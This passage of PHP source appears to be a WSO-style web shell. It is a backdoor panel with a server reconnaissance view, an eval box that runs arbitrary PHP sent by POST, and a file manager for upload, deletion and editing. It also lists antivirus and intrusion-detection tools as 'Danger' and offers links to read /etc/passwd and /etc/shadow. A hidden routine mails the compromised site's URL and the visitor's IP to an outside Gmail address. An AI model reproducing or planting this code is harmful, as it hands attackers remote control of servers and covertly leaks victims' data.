{background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n 
.logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( 
(req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n 
for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." 
Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. 
\'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit 
value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). 
\' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? 
\'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = 
array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = 
"document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) 
echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = 
@scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, 
array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden 
